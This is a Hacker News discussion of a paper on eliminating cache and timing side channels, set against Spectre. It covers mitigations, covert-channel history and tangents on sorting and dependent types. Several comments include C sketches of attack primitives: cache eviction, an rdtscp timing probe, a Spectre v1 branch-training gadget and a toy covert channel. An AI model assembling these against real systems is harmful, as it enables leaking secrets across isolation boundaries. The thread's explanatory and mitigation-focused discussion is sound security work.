Robust and Efficient Elimination of Cache and Timing Side Channels (2015) (arxiv.org)
55 points by KirinDave on Jan 6, 2018 | 22 comments



This seems to require developer input

"In our solution, developers annotate the functions perform- ing sensitive computation(s) that they would like to protect."

and assumes that cache timing is used to gather info on a secret function, so it does not consider the use case of dumping everything a process can see?


Their performance results depend on isolating “protected” functions that access sensitive data, while keeping the rest of the code unprotected. That’s fine in a sane world, but with Spectre, just about any code can be tricked into speculatively accessing sensitive data in its address space. So trying to adapt this into a Spectre mitigation reduces to just flushing all CPU caches on every context switch (plus giving each core a separate chunk of the L3 cache, which is supposed to be shared). That would be… not pretty, from a performance standpoint.


Consider, though: similar logic led us not to flush the cache, and here we are.

Until we have better ways of reasoning about and restricting the code we are running, it isn't going to get prettier. Conservative approaches like this may not be best for every purpose, but in hardened code like a hypervisor it might make sense.


Isn't the problem rather that we have instructions to control the cache at all? As far as my research goes, things like CLFLUSH were introduced at the same time as SSE2, which was what, the Pentium 4 era? We were apparently doing fine without them before that, even with 4+ CPU systems.

I'm currently trying to get the spectre.c PoC to work without using CLFLUSH or similar, but it doesn't look too promising yet. Then again, I only started an hour ago and lack the ability to think in those creative and twisted ways that lead to the discovery of this whole issue in the first place.
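
For anyone poking at the same thing: the standard CLFLUSH-free substitute is eviction, i.e. walking a buffer big enough to displace the target's line from the cache. A minimal sketch, where the 8 MiB buffer and 64-byte line size are assumptions about the machine:

    /* Minimal sketch of CLFLUSH-free eviction: touch one byte per line
       of a buffer assumed to be at least as large as the LLC, so that
       previously cached lines get displaced. Sizes are assumptions. */
    #include <stddef.h>
    #include <stdint.h>

    #define EVICT_SIZE (8u * 1024 * 1024)  /* assumed >= last-level cache */
    #define LINE 64                        /* assumed cache line size */

    static uint8_t evict_buf[EVICT_SIZE];

    static void evict_everything(void)
    {
        volatile uint8_t sink = 0;
        for (size_t i = 0; i < EVICT_SIZE; i += LINE)
            sink += evict_buf[i];          /* touch one byte per line */
        (void)sink;
    }

It's slower and noisier than CLFLUSH, and set-associativity means a targeted eviction set can beat a full walk, which is part of why the PoC gets harder without the instruction.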


> We were apparently doing fine without them before that

well, feel free to return to using pentium2-like CPUs


This reads as if a poisoned CPU cache can indeed leak secrets, and that this has been known for many years now? Am I reading that right?


Practical secret extraction from caches --- practical as in "papers documenting C programs the authors wrote to verify their claims" --- goes back to at least 2005.

Here's a very well-known paper: https://www.cs.tau.ac.il/~tromer/papers/cache.pdf

It's the speculative execution side channel that's new. What we didn't fully grok was the idea that code that never really runs could leave predictable cache footprints.
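
The measurement primitive behind all of these attacks is tiny. A sketch of the reload/probe half on x86-64 (the ~100-cycle threshold is a machine-dependent placeholder, not a universal constant):

    /* Sketch of the timing probe cache attacks share: time a single
       load with rdtscp and compare against a hit/miss threshold. */
    #include <stdint.h>
    #include <x86intrin.h>

    static inline uint64_t time_load(volatile uint8_t *addr)
    {
        unsigned aux;
        uint64_t start = __rdtscp(&aux);
        (void)*addr;                   /* the probed access */
        return __rdtscp(&aux) - start;
    }

    /* After the victim runs: a fast load means the victim (or its
       speculative shadow) touched this line. */
    static int was_accessed(volatile uint8_t *addr)
    {
        return time_load(addr) < 100;  /* assumed hit/miss threshold */
    }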


It's so obvious now, in retrospect :(


and that you can poison prediction state (branch predictor / branch target buffer etc) and cache state to force longer periods of processor speculation, leaving more room for unintended side effects.
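
Concretely, the v1 pattern being described has the shape of the public spectre.c gadget (names and sizes here are illustrative, not the actual PoC's):

    /* Sketch of the Spectre v1 shape: train the bounds check to predict
       "in bounds", then pass an out-of-bounds index. The speculative
       body encodes a secret byte into the cache state of probe[],
       recoverable later by timing loads from probe[]. */
    #include <stddef.h>
    #include <stdint.h>

    size_t array1_size = 16;
    uint8_t array1[16];
    uint8_t probe[256 * 512];          /* one cache line per byte value */
    volatile uint8_t sink;

    void victim(size_t x)
    {
        if (x < array1_size)                 /* predictor trained: taken */
            sink = probe[array1[x] * 512];   /* secret-dependent load */
    }

    void train_then_attack(size_t evil_x)
    {
        for (int i = 0; i < 30; i++)         /* train with in-bounds x */
            victim(i % array1_size);
        victim(evil_x);                      /* speculated out of bounds */
    }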


The folks that invented high-assurance security (TCSEC A1-class) were eliminating storage and timing channels as best they could. An early reference is the VAX Security Kernel, which tried to assess and mitigate timing channels.

http://ix.cs.uoregon.edu/~butler/teaching/10F/cis607/papers/...

http://ieeexplore.ieee.org/document/213271/

Mainstream security professionals have always ignored such work, dismissing it as red tape with no value, or as too costly. The early work preempted most problems, though, back in the 1980s-1990s, by focusing on root causes. The same crowd that ignores it keeps rediscovering the lessons in new forms while continuing to ignore them. (There are exceptions who pay attention.) As far as covert channels go, the first technique I saw for systematically examining them was Kemmerer's in 1983. It was one that made it into the first criteria for security certification. As in, it was mandatory to look for covert/side channels as best you could.

http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.462...

https://fas.org/irp/nsa/rainbow/tg030.htm

So, the basic concepts have been known for decades under covert channel analysis. The analysis technique established long ago was to identify every shared resource between two things in the system. If they could read/write to it, it was a potential storage channel. It was a timing channel if they could manipulate its activity and had a way to time that. Those are the basic ones. So, you can just list everything, categorize it, and do the analysis by brute force (toy sketch after the link below). They'd have found the caching stuff quickly. Here's an example that should've happened a long time ago:

https://eprint.iacr.org/2016/613.pdf
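
To make the shared-resource framing concrete, here's the storage-channel case as a toy sketch; the file path is an arbitrary choice, and real channels use subtler shared state:

    /* Toy storage channel: two processes share a resource (here, a
       file's existence) that one can write and the other can read, so
       it can carry bits between them. POSIX only; path is arbitrary. */
    #include <stdio.h>
    #include <unistd.h>

    #define FLAG "/tmp/covert_flag"    /* the shared resource */

    void send_bit(int bit)             /* run in the sender process */
    {
        if (bit) {
            FILE *f = fopen(FLAG, "w");
            if (f) fclose(f);          /* present = 1 */
        } else {
            unlink(FLAG);              /* absent = 0 */
        }
    }

    int recv_bit(void)                 /* run in the receiver process */
    {
        return access(FLAG, F_OK) == 0;
    }

A timing channel is the same analysis with "can time its activity" in place of "can read it", which is exactly where the cache falls out.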


Even longer.

What's really wild is that they even got the rough proportion of security cost for losing it down to 5% of the numbers we're seeing with today's security patches.

I submitted this because I think their technique is preferable for a lot of what distributed-systems developers do with crypto primitives (as opposed to retpoline).

There are lots of well-known things no one seems to know outside of academia, like how generalized sorting is O(n), or compilers that can prove the correctness of real-world code when it's written a specific way.


What's interesting to me about this paper is how many different things they had to worry about: disable scheduling, pin to a single core, page coloring, no huge pages, disable hyperthreading, disable frequency scaling, and lastly the lazy cleanup (I think that's all?). It's a pretty long list of kernel modifications and configuration, and I doubt these will ever be defaults.


> generalized sorting is O(n)

What do you mean by generalized sorting and how isn't this affected by the comparison sorting lower bound?

Do you have a source?


They probably mean the "postman sort", or whatever catchy name it goes by (radix sort, IIRC). That doesn't involve any comparisons between elements to be sorted. Think of how a postman sorts mail into P.O. boxes... you just algorithmically map a number to a row and column (bin), and deliver. This truly is O(N), but there's a catch: it doesn't work when you don't have bins to sort into, or when you don't even know how many bins you'll need. If you try to generalize this it becomes O(N log N).
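
The bin-mapping idea as code, for reference: LSD radix sort of 32-bit keys, where the fixed key width is exactly the "known bins" assumption above.

    /* The postman/bin idea in code: LSD radix sort of 32-bit keys, one
       stable counting pass per byte. No element-to-element comparisons;
       the 256 possible byte values are the fixed, known bins. */
    #include <stddef.h>
    #include <stdint.h>
    #include <stdlib.h>
    #include <string.h>

    void radix_sort_u32(uint32_t *a, size_t n)
    {
        uint32_t *tmp = malloc(n * sizeof *tmp);
        if (!tmp) return;
        for (int shift = 0; shift < 32; shift += 8) {
            size_t count[256] = {0};
            for (size_t i = 0; i < n; i++)       /* histogram this byte */
                count[(a[i] >> shift) & 0xFF]++;
            size_t pos = 0;
            for (int b = 0; b < 256; b++) {      /* prefix sums -> offsets */
                size_t c = count[b];
                count[b] = pos;
                pos += c;
            }
            for (size_t i = 0; i < n; i++)       /* stable scatter to bins */
                tmp[count[(a[i] >> shift) & 0xFF]++] = a[i];
            memcpy(a, tmp, n * sizeof *a);
        }
        free(tmp);
    }

Four O(n + 256) passes, so O(n) overall for fixed-width keys; the catch described above is what happens when the key width isn't fixed.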


Well... Actually, no. First of all, radix sort uses structural features to arrive at linear time; it doesn't incompletely sort the input.

Secondly, I've tried to get the white paper exposed here and it generally goes over like a lead balloon but:

http://www.diku.dk/hjemmesider/ansatte/henglein/papers/hengl...

Is the technique. It's an imposing 80-page paper that even dedicated educators like Edward Kmett have trouble explaining trivially, but there is a talk here by the author to help sum it up: https://www.youtube.com/watch?v=sz9ZlZIRDAg

We've had some of Henglein's associates here to talk about it, too.

There is a Haskell implementation and it can really speed up certain types of operations. It's tricky to get the constants low in Haskell, but Kmett seems to have done a pretty good job.


Please see my comment below.


Could you share some more information about generalized sorting in O(n)? Are you talking about algorithms like radix sort?



> compilers that can prove the correctness of real world code when it's written a specific way

Do you have something I can read? I'm curious specifically what you mean by this.


Agda and Idris are languages with more "real world" applications; they can validate totality and offer proofs.

It's pretty cool because you can essentially extend the type system ad hoc to understand all valid transitions for your types, then prove them.

Idris is different from Agda in that it has great introductory literature (the Idris book is just fantastic), and it also has F#-style type providers that let you do things like query the AWS API with a given account's creds and then extend the type system with a series of descriptive types for all valid operations for every asset.

It means that you can (and I find this really surprising) assert code totality on very real world use cases like code that orchestrates containers, binary parsers, or network protocols.

I spent my Christmas break studying Idris, and what really delighted me most was that in many cases systems like that end up being simpler to use (even though their "Verified" constructions often involve supplying simple inductive proofs to the compiler). You don't have to prove everything, but the things that are proven are safe to use.


I'm familiar with dependently typed languages, I thought you might mean something different than semi-manual theorem proving. For instance, writing your program in a particular style that could maximally take advantage of automated SMT solving in LiquidHaskell or something.


Cache as a channel: SSH over cache: https://www.youtube.com/watch?v=a9sGk7FtnYk



